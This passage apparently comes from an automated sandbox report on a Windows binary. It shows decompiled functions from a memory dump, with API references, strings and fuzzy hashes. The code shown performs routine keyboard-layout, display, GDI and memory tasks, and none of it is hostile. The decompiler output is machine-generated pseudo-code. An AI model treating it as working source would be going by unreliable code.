									 *[fs:eax] = _t111;
									_push(0x98c8e2);
									return RegCloseKey(_v16);
								}
							}
							goto L12;
							L9:
							_v24 = _v24 + 4;
							_t38 =  &_v20;
							 *_t38 = _v20 - 1;
						} while ( *_t38 != 0);
						goto L10;
					}
				}
				L12:
			}





















                                            0x0098c774
                                            0x0098c775
                                            0x0098c777
                                            0x0098c780
                                            0x0098c786
                                            0x0098c78b
                                            0x0098c78c
                                            0x0098c791
                                            0x0098c794
                                            0x0098c79e
                                            0x0098c900
                                            0x0098c908
                                            0x0098c90b
                                            0x0098c90e
                                            0x0098c91e
                                            0x0098c7a4
                                            0x0098c7b3
                                            0x0098c7bc
                                            0x0098c7cf
                                            0x0098c7d2
                                            0x0098c8ef
                                            0x0098c8f5
                                            0x0098c8fb
                                            0x00000000
                                            0x0098c7d8
                                            0x0098c7d9
                                            0x0098c7e2
                                            0x0098c7e5
                                            0x0098c7f1
                                            0x00000000
                                            0x0098c7f7
                                            0x0098c809
                                            0x0098c80f
                                            0x0098c839
                                            0x00000000
                                            0x0098c83f
                                            0x0098c841
                                            0x0098c842
                                            0x0098c847
                                            0x0098c84a
                                            0x0098c84d
                                            0x0098c873
                                            0x0098c886
                                            0x0098c89e
                                            0x0098c8ac
                                            0x0098c8bf
                                            0x0098c8bf
                                            0x0098c8ac
                                            0x0098c8c6
                                            0x0098c8c9
                                            0x0098c8cc
                                            0x0098c8da
                                            0x0098c8da
                                            0x0098c839
                                            0x00000000
                                            0x0098c8e2
                                            0x0098c8e2
                                            0x0098c8e6
                                            0x0098c8e6
                                            0x0098c8e6
                                            0x00000000
                                            0x0098c7e5
                                            0x0098c7d2
                                            0x00000000

                                            APIs
                                            • GetKeyboardLayoutList.USER32(00000040,?,00000000,0098C91F,?,00F01320,?,0098C981,00000000,?,00971B43), ref: 0098C7CA
                                            • RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 0098C832
                                            • RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,0098C8DB,?,80000002,00000000), ref: 0098C86C
                                            • RegCloseKey.ADVAPI32(?,0098C8E2,00000000,?,00000100,00000000,0098C8DB,?,80000002,00000000), ref: 0098C8D5
                                            Strings
                                            • System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 0098C81C
                                            • layout text, xrefs: 0098C863
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CloseKeyboardLayoutListOpenQueryValue
                                            • String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
                                            • API String ID: 1703357764-2652665750
                                            • Opcode ID: 216ead329819ba3fc86f677e5564a9e3c581122e05db3c46294d9e28753f6faf
                                            • Instruction ID: 61abe405fdd6bc7805a4744c67a27c37c35c38ba1ad9b9970f7a8dec79ee6813
                                            • Opcode Fuzzy Hash: 216ead329819ba3fc86f677e5564a9e3c581122e05db3c46294d9e28753f6faf
                                            • Instruction Fuzzy Hash: 5141F6B4A00209AFDB50EFA4C986FAEB7F8EB88704F5044E1E904E7351D771AE44DB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 009656A0, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68stringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 47%
                                            			E009656A0(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x99c92d != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *((intOrPtr*)(_t29 + 8)) = 0;
						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L0094647C();
						}
						_t24 = 1;
					}
				} else {
					_t26 =  *0x99c914; // 0x9656a0
					 *0x99c914 = E0096529C(5, _t23, _t26, _t27, _t29);
					_t24 =  *0x99c914(_t27, _t29);
				}
				return _t24;
			}














                                            0x009656a9
                                            0x009656ac
                                            0x009656b6
                                            0x009656db
                                            0x009656e3
                                            0x00965703
                                            0x00965708
                                            0x00965713
                                            0x0096571e
                                            0x00965728
                                            0x00965729
                                            0x0096572a
                                            0x0096572b
                                            0x0096572c
                                            0x0096572d
                                            0x00965737
                                            0x00965739
                                            0x00965741
                                            0x00965742
                                            0x00965742
                                            0x00965747
                                            0x00965747
                                            0x009656b8
                                            0x009656bd
                                            0x009656ca
                                            0x009656d7
                                            0x009656d7
                                            0x00965751

                                            APIs
                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 009656F8
                                            • GetSystemMetrics.USER32 ref: 0096570D
                                            • GetSystemMetrics.USER32 ref: 00965718
                                            • lstrcpy.KERNEL32(?,DISPLAY), ref: 00965742
                                              • Part of subcall function 0096529C: GetClassInfoExW.USER32 ref: 009652AD
                                              • Part of subcall function 0096529C: GetProcAddress.KERNEL32(73FA0000,00000000), ref: 0096531C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: System$InfoMetrics$AddressClassParametersProclstrcpy
                                            • String ID: DISPLAY$GetMonitorInfoA
                                            • API String ID: 2548337072-1370492664
                                            • Opcode ID: 196a6b3d6acccac7f8bb757d265dfbd813e7d0865f9d332bd7e2da0bec7f54e8
                                            • Instruction ID: bd9519abc7e015bfb6f2cf66ff7064579d15abdf72b6d4cd274a13cec1cc3e3d
                                            • Opcode Fuzzy Hash: 196a6b3d6acccac7f8bb757d265dfbd813e7d0865f9d332bd7e2da0bec7f54e8
                                            • Instruction Fuzzy Hash: 33112FB1602B049FD720CF68DD45BABB7ECEB4A310F01492AEC59D7290D7B0A840CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00965774, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68stringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 47%
                                            			E00965774(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x99c92e != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *((intOrPtr*)(_t29 + 8)) = 0;
						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L0094647C();
						}
						_t24 = 1;
					}
				} else {
					_t26 =  *0x99c918; // 0x965774
					 *0x99c918 = E0096529C(6, _t23, _t26, _t27, _t29);
					_t24 =  *0x99c918(_t27, _t29);
				}
				return _t24;
			}














                                            0x0096577d
                                            0x00965780
                                            0x0096578a
                                            0x009657af
                                            0x009657b7
                                            0x009657d7
                                            0x009657dc
                                            0x009657e7
                                            0x009657f2
                                            0x009657fc
                                            0x009657fd
                                            0x009657fe
                                            0x009657ff
                                            0x00965800
                                            0x00965801
                                            0x0096580b
                                            0x0096580d
                                            0x00965815
                                            0x00965816
                                            0x00965816
                                            0x0096581b
                                            0x0096581b
                                            0x0096578c
                                            0x00965791
                                            0x0096579e
                                            0x009657ab
                                            0x009657ab
                                            0x00965825

                                            APIs
                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 009657CC
                                            • GetSystemMetrics.USER32 ref: 009657E1
                                            • GetSystemMetrics.USER32 ref: 009657EC
                                            • lstrcpy.KERNEL32(?,DISPLAY), ref: 00965816
                                              • Part of subcall function 0096529C: GetClassInfoExW.USER32 ref: 009652AD
                                              • Part of subcall function 0096529C: GetProcAddress.KERNEL32(73FA0000,00000000), ref: 0096531C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: System$InfoMetrics$AddressClassParametersProclstrcpy
                                            • String ID: DISPLAY$GetMonitorInfoW
                                            • API String ID: 2548337072-2774842281
                                            • Opcode ID: 34cbbc26f14f73f7d7db1f2d78d5558c6aa3b8c59171e3bdd29f811e69b723c0
                                            • Instruction ID: 5a149b87b13da0afa9ce153a6ff4a10ec110b95484a8f37eb58a8af9acd1ae83
                                            • Opcode Fuzzy Hash: 34cbbc26f14f73f7d7db1f2d78d5558c6aa3b8c59171e3bdd29f811e69b723c0
                                            • Instruction Fuzzy Hash: 721134B1622B019FD730CF64CC80BA7B7E8EF45720F02882AEC55D7650E370A940DBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 009621D8, Relevance: 10.6, APIs: 7, Instructions: 66COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 75%
                                            			E009621D8(int __eax, void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				struct HDC__* _v12;
				struct HDC__* _v16;
				void* _v20;
				struct tagRGBQUAD _v1044;
				int _t16;
				int _t37;
				intOrPtr _t44;
				void* _t46;
				void* _t49;
				void* _t51;
				intOrPtr _t52;

				_t16 = __eax;
				_t49 = _t51;
				_t52 = _t51 + 0xfffffbf0;
				_v8 = __edx;
				_t46 = __eax;
				if(__eax == 0 ||  *((short*)(__ecx + 0x26)) > 8) {
					L4:
					return _t16;
				} else {
					_t16 = E0096103C(_v8, 0xff,  &_v1044);
					_t37 = _t16;
					if(_t37 == 0) {
						goto L4;
					} else {
						_v12 = GetDC(0);
						_v16 = CreateCompatibleDC(_v12);
						_v20 = SelectObject(_v16, _t46);
						_push(_t49);
						_push(0x962287);
						_push( *[fs:eax]);
						 *[fs:eax] = _t52;
						SetDIBColorTable(_v16, 0, _t37,  &_v1044);
						_pop(_t44);
						 *[fs:eax] = _t44;
						_push(0x96228e);
						SelectObject(_v16, _v20);
						DeleteDC(_v16);
						return ReleaseDC(0, _v12);
					}
				}
			}















                                            0x009621d8
                                            0x009621d9
                                            0x009621db
                                            0x009621e3
                                            0x009621e6
                                            0x009621ea
                                            0x0096228e
                                            0x00962293
                                            0x009621fb
                                            0x00962209
                                            0x0096220e
                                            0x00962212
                                            0x00000000
                                            0x00962214
                                            0x0096221b
                                            0x00962227
                                            0x00962234
                                            0x00962239
                                            0x0096223a
                                            0x0096223f
                                            0x00962242
                                            0x00962253
                                            0x0096225a
                                            0x0096225d
                                            0x00962260
                                            0x0096226d
                                            0x00962276
                                            0x00962286
                                            0x00962286
                                            0x00962212

                                            APIs
                                              • Part of subcall function 0096103C: GetObjectA.GDI32(?,00000004), ref: 00961053
                                              • Part of subcall function 0096103C: GetPaletteEntries.GDI32(?,00000000,?,?), ref: 00961076
                                            • GetDC.USER32 ref: 00962216
                                            • CreateCompatibleDC.GDI32(?), ref: 00962222
                                            • SelectObject.GDI32(?), ref: 0096222F
                                            • SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,00962287,?,?,?,?,00000000), ref: 00962253
                                            • SelectObject.GDI32(?,?), ref: 0096226D
                                            • DeleteDC.GDI32(?), ref: 00962276
                                            • ReleaseDC.USER32 ref: 00962281
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Object$Select$ColorCompatibleCreateDeleteEntriesPaletteReleaseTable
                                            • String ID:
                                            • API String ID: 4046155103-0
                                            • Opcode ID: 37230456253a7198148dfa38a42ded70cf1ea22e586dde1438122023cf3f3d5f
                                            • Instruction ID: 2e1f2a29977923950f2c521b4ca9bdd845e94434b30f61875f5de435c69dd7c9
                                            • Opcode Fuzzy Hash: 37230456253a7198148dfa38a42ded70cf1ea22e586dde1438122023cf3f3d5f
                                            • Instruction Fuzzy Hash: 78115BB6E00749ABDB14EBE8C891EAEB3BCEB89700F0044A5FA14E7251D675DD408B65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0095C488, Relevance: 9.1, APIs: 6, Instructions: 109threadCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 67%
                                            			E0095C488(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v5;
				intOrPtr* _v12;
				long _v16;
				char _v20;
				char _v24;
				long _t22;
				char _t29;
				void* _t53;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr _t63;
				intOrPtr _t66;
				intOrPtr _t67;
				void* _t72;
				void* _t73;
				intOrPtr _t74;

				_t72 = _t73;
				_t74 = _t73 + 0xffffffec;
				_push(__esi);
				_push(__edi);
				_t53 = __eax;
				_t22 = GetCurrentThreadId();
				_t62 =  *0x99b228; // 0x99c034
				if(_t22 !=  *_t62) {
					_v24 = GetCurrentThreadId();
					_v20 = 0;
					_t61 =  *0x99b0a8; // 0x9538bc
					E0094B63C(_t53, _t61, 1, __edi, __esi, 0,  &_v24);
					E00943964();
				}
				if(_t53 <= 0) {
					E0095C460();
				} else {
					E0095C46C(_t53);
				}
				_v16 = 0;
				_push(0x99c870);
				L009462BC();
				_push(_t72);
				_push(0x95c616);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				_v16 = InterlockedExchange(0x99a404, _v16);
				_push(_t72);
				_push(0x95c5f7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				if(_v16 == 0 ||  *((intOrPtr*)(_v16 + 8)) <= 0) {
					_t29 = 0;
				} else {
					_t29 = 1;
				}
				_v5 = _t29;
				if(_v5 == 0) {
					L14:
					_pop(_t63);
					 *[fs:eax] = _t63;
					_push(0x95c5fe);
					return E0094312C(_v16);
				} else {
					if( *((intOrPtr*)(_v16 + 8)) > 0) {
						_v12 = E00956C88(_v16, 0);
						E00956B78(_v16, 0);
						L009463E4();
						 *[fs:eax] = _t74;
						 *[fs:eax] = _t74;
						 *((intOrPtr*)( *_v12 + 8))( *[fs:eax], _t72,  *[fs:eax], 0x95c5c1, _t72, 0x99c870);
						_pop(_t66);
						 *[fs:eax] = _t66;
						_t67 = 0x95c592;
						 *[fs:eax] = _t67;
						_push(0x95c5c8);
						_push(0x99c870);
						L009462BC();
						return 0;
					} else {
						goto L14;
					}
				}
			}



















                                            0x0095c489
                                            0x0095c48b
                                            0x0095c48f
                                            0x0095c490
                                            0x0095c491
                                            0x0095c493
                                            0x0095c498
                                            0x0095c4a0
                                            0x0095c4a7
                                            0x0095c4aa
                                            0x0095c4b4
                                            0x0095c4c1
                                            0x0095c4c6
                                            0x0095c4c6
                                            0x0095c4cd
                                            0x0095c4d8
                                            0x0095c4cf
                                            0x0095c4d1
                                            0x0095c4d1
                                            0x0095c4df
                                            0x0095c4e2
                                            0x0095c4e7
                                            0x0095c4ee
                                            0x0095c4ef
                                            0x0095c4f4
                                            0x0095c4f7
                                            0x0095c508
                                            0x0095c50d
                                            0x0095c50e
                                            0x0095c513
                                            0x0095c516
                                            0x0095c51d
                                            0x0095c528
                                            0x0095c52c
                                            0x0095c52c
                                            0x0095c52c
                                            0x0095c52e
                                            0x0095c535
                                            0x0095c5e1
                                            0x0095c5e3
                                            0x0095c5e6
                                            0x0095c5e9
                                            0x0095c5f6
                                            0x0095c53b
                                            0x0095c5db
                                            0x0095c54a
                                            0x0095c552
                                            0x0095c55c
                                            0x0095c56c
                                            0x0095c57a
                                            0x0095c585
                                            0x0095c58a
                                            0x0095c58d
                                            0x0095c5ab
                                            0x0095c5ae
                                            0x0095c5b1
                                            0x0095c5b6
                                            0x0095c5bb
                                            0x0095c5c0
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0095c5db

                                            APIs
                                            • GetCurrentThreadId.KERNEL32 ref: 0095C493
                                            • GetCurrentThreadId.KERNEL32 ref: 0095C4A2
                                              • Part of subcall function 0095C460: ResetEvent.KERNEL32(0000028C,0095C4DD), ref: 0095C466
                                            • RtlEnterCriticalSection.KERNEL32(0099C870), ref: 0095C4E7
                                            • InterlockedExchange.KERNEL32(0099A404,?), ref: 0095C503
                                            • RtlLeaveCriticalSection.KERNEL32(0099C870,00000000,0095C5F7,?,00000000,0095C616,?,0099C870), ref: 0095C55C
                                            • RtlEnterCriticalSection.KERNEL32(0099C870,0095C5C8,0095C5F7,?,00000000,0095C616,?,0099C870), ref: 0095C5BB
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CriticalSection$CurrentEnterThread$EventExchangeInterlockedLeaveReset
                                            • String ID:
                                            • API String ID: 2189153385-0
                                            • Opcode ID: 2c238d7e910480075a79626223872c880beacc29fc605b1614f785d65a4c0bc2
                                            • Instruction ID: a0925ed0ebd2c8c08bde950655b4a949e7822558a31c92e6d0c213f647819689
                                            • Opcode Fuzzy Hash: 2c238d7e910480075a79626223872c880beacc29fc605b1614f785d65a4c0bc2
                                            • Instruction Fuzzy Hash: 4031E2B0A08304AFD701DFAADC52E2DB7F8EB8A705F5184A0F800D3661E774A908CB21
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 009612E8, Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 81%
                                            			E009612E8(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, signed int* _a4, signed int* _a8) {
				intOrPtr* _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v32;
				struct HDC__* _v44;
				signed int* _t36;
				signed int _t39;
				signed int _t42;
				signed int* _t52;
				signed int _t56;
				intOrPtr _t66;
				void* _t72;
				void* _t73;
				void* _t74;
				intOrPtr _t75;

				_t73 = _t74;
				_t75 = _t74 + 0xffffff90;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_t52 = _a8;
				_v24 = _v16 << 4;
				_v20 = E00947CB8(_v24, __eflags);
				 *[fs:edx] = _t75;
				_t56 = _v24;
				 *((intOrPtr*)( *_v8 + 0xc))( *[fs:edx], 0x9615df, _t73, __edi, __esi, __ebx, _t72);
				if(( *_t52 | _t52[1]) != 0) {
					_t36 = _a4;
					 *_t36 =  *_t52;
					_t36[1] = _t52[1];
				} else {
					 *_a4 = GetSystemMetrics(0xb);
					_a4[1] = GetSystemMetrics(0xc);
				}
				_v44 = GetDC(0);
				if(_v44 == 0) {
					E009607AC(_t56);
				}
				_push(_t73);
				_push(0x9613d1);
				_push( *[fs:edx]);
				 *[fs:edx] = _t75;
				_t39 = GetDeviceCaps(_v44, 0xe);
				_t42 = _t39 * GetDeviceCaps(_v44, 0xc);
				if(_t42 <= 8) {
					__eflags = 1;
					_v32 = 1 << _t42;
				} else {
					_v32 = 0x7fffffff;
				}
				_pop(_t66);
				 *[fs:eax] = _t66;
				_push(0x9613d8);
				return ReleaseDC(0, _v44);
			}




















                                            0x009612e9
                                            0x009612eb
                                            0x009612f1
                                            0x009612f4
                                            0x009612f7
                                            0x009612fa
                                            0x00961303
                                            0x0096130e
                                            0x0096131c
                                            0x00961322
                                            0x0096132a
                                            0x00961332
                                            0x0096134f
                                            0x00961354
                                            0x00961359
                                            0x00961334
                                            0x0096133e
                                            0x0096134a
                                            0x0096134a
                                            0x00961363
                                            0x0096136a
                                            0x0096136c
                                            0x0096136c
                                            0x00961373
                                            0x00961374
                                            0x00961379
                                            0x0096137c
                                            0x00961385
                                            0x0096139b
                                            0x009613a1
                                            0x009613b3
                                            0x009613b5
                                            0x009613a3
                                            0x009613a3
                                            0x009613a3
                                            0x009613ba
                                            0x009613bd
                                            0x009613c0
                                            0x009613d0

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CapsDeviceMetricsSystem$Release
                                            • String ID:
                                            • API String ID: 447804332-0
                                            • Opcode ID: 0fa598896adaee2ce85749c9554b8d2a08c7409a1fc69dff919aed02f5dc89be
                                            • Instruction ID: a88de6c3b087af5edb10fedd3217bbf01f1cd8a71e6267965fd84e4cca5bfe1a
                                            • Opcode Fuzzy Hash: 0fa598896adaee2ce85749c9554b8d2a08c7409a1fc69dff919aed02f5dc89be
                                            • Instruction Fuzzy Hash: 3C316DB4E00208EFDB00DFA5C881EADBBB5FBC9710F148565F815AB784C670AD40CB65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00961740, Relevance: 9.1, APIs: 6, Instructions: 65windowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 67%
                                            			E00961740(struct HBITMAP__* __eax, void* __ebx, struct tagBITMAPINFO* __ecx, struct HPALETTE__* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
				char _v5;
				struct HPALETTE__* _v12;
				struct HDC__* _v16;
				struct tagBITMAPINFO* _t36;
				intOrPtr _t43;
				struct HBITMAP__* _t47;
				void* _t50;

				_t36 = __ecx;
				_t47 = __eax;
				E009615F0(__eax, _a4, __ecx);
				_v12 = 0;
				_v16 = CreateCompatibleDC("true");
				_push(_t50);
				_push(0x9617dd);
				_push( *[fs:eax]);
				 *[fs:eax] = _t50 + 0xfffffff4;
				if(__edx != 0) {
					_v12 = SelectPalette(_v16, __edx, 0);
					RealizePalette(_v16);
				}
				_v5 = GetDIBits(_v16, _t47, 0, _t36->bmiHeader.biHeight, _a8, _t36, 0) != 0;
				_pop(_t43);
				 *[fs:eax] = _t43;
				_push(0x9617e4);
				if(_v12 != 0) {
					SelectPalette(_v16, _v12, 0);
				}
				return DeleteDC(_v16);
			}










                                            0x00961749
                                            0x0096174d
                                            0x00961756
                                            0x0096175d
                                            0x00961767
                                            0x0096176c
                                            0x0096176d
                                            0x00961772
                                            0x00961775
                                            0x0096177a
                                            0x00961788
                                            0x0096178f
                                            0x0096178f
                                            0x009617ad
                                            0x009617b3
                                            0x009617b6
                                            0x009617b9
                                            0x009617c2
                                            0x009617ce
                                            0x009617ce
                                            0x009617dc

                                            APIs
                                              • Part of subcall function 009615F0: GetObjectA.GDI32(?,00000054), ref: 00961604
                                            • CreateCompatibleDC.GDI32(00000000), ref: 00961762
                                            • SelectPalette.GDI32(?,?,00000000), ref: 00961783
                                            • RealizePalette.GDI32(?), ref: 0096178F
                                            • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 009617A6
                                            • SelectPalette.GDI32(?,00000000,00000000), ref: 009617CE
                                            • DeleteDC.GDI32(?), ref: 009617D7
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Palette$Select$BitsCompatibleCreateDeleteObjectRealize
                                            • String ID:
                                            • API String ID: 1221726059-0
                                            • Opcode ID: 41de68a91ecb9dea2d5a1050da071bc8addc913aa5ae461ccf877fded7790c4c
                                            • Instruction ID: 795bf142ee4f5d43900a2166f19d215f48354d1423a71b2fc7e74373a63730fd
                                            • Opcode Fuzzy Hash: 41de68a91ecb9dea2d5a1050da071bc8addc913aa5ae461ccf877fded7790c4c
                                            • Instruction Fuzzy Hash: 77118CB5A00308BFDB10DBADCC82F9EB7FCEB89700F1480A5B518E7281D67499008B25
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00941B00, Relevance: 9.1, APIs: 6, Instructions: 62COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 71%
                                            			E00941B00() {
				void* _t2;
				void* _t3;
				void* _t14;
				intOrPtr* _t19;
				intOrPtr _t23;
				intOrPtr _t26;
				intOrPtr _t28;

				_t26 = _t28;
				if( *0x99c5c4 == 0) {
					return _t2;
				} else {
					_push(_t26);
					_push(0x941bd6);
					_push( *[fs:edx]);
					 *[fs:edx] = _t28;
					if( *0x99c04d != 0) {
						_push(0x99c5cc);
						L00941398();
					}
					 *0x99c5c4 = 0;
					_t3 =  *0x99c624; // 0xa41ea0
					LocalFree(_t3);
					 *0x99c624 = 0;
					_t19 =  *0x99c5ec; // 0xa434d4
					while(_t19 != 0x99c5ec) {
						VirtualFree( *(_t19 + 8), 0, 0x8000);
						_t19 =  *_t19;
					}
					E00941400(0x99c5ec);
					E00941400(0x99c5fc);
					E00941400(0x99c628);
					_t14 =  *0x99c5e4; // 0xa42ea0
					while(_t14 != 0) {
						 *0x99c5e4 =  *_t14;
						LocalFree(_t14);
						_t14 =  *0x99c5e4; // 0xa42ea0
					}
					_pop(_t23);
					 *[fs:eax] = _t23;
					_push(0x941bdd);
					if( *0x99c04d != 0) {
						_push(0x99c5cc);
						L009413A0();
					}
					_push(0x99c5cc);
					L009413A8();
					return 0;
				}
			}










                                            0x00941b01
                                            0x00941b0b
                                            0x00941bdf
                                            0x00941b11
                                            0x00941b13
                                            0x00941b14
                                            0x00941b19
                                            0x00941b1c
                                            0x00941b26
                                            0x00941b28
                                            0x00941b2d
                                            0x00941b2d
                                            0x00941b32
                                            0x00941b39
                                            0x00941b3f
                                            0x00941b46
                                            0x00941b4b
                                            0x00941b65
                                            0x00941b5e
                                            0x00941b63
                                            0x00941b63
                                            0x00941b72
                                            0x00941b7c
                                            0x00941b86
                                            0x00941b8b
                                            0x00941b92
                                            0x00941b96
                                            0x00941b9d
                                            0x00941ba2
                                            0x00941ba7
                                            0x00941bad
                                            0x00941bb0
                                            0x00941bb3
                                            0x00941bbf
                                            0x00941bc1
                                            0x00941bc6
                                            0x00941bc6
                                            0x00941bcb
                                            0x00941bd0
                                            0x00941bd5
                                            0x00941bd5

                                            APIs
                                            • RtlEnterCriticalSection.KERNEL32(0099C5CC,00000000,00941BD6), ref: 00941B2D
                                            • LocalFree.KERNEL32(00A41EA0,00000000,00941BD6), ref: 00941B3F
                                            • VirtualFree.KERNEL32(?,00000000,00008000,00A41EA0,00000000,00941BD6), ref: 00941B5E
                                            • LocalFree.KERNEL32(00A42EA0,?,00000000,00008000,00A41EA0,00000000,00941BD6), ref: 00941B9D
                                            • RtlLeaveCriticalSection.KERNEL32(0099C5CC,00941BDD,00A41EA0,00000000,00941BD6), ref: 00941BC6
                                            • RtlDeleteCriticalSection.KERNEL32(0099C5CC,00941BDD,00A41EA0,00000000,00941BD6), ref: 00941BD0
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                            • String ID:
                                            • API String ID: 3782394904-0
                                            • Opcode ID: 019b83b4e9188ae3dc6cd8f35ae1ca310736e6178f5e9aa50ed0a502c72fdab1
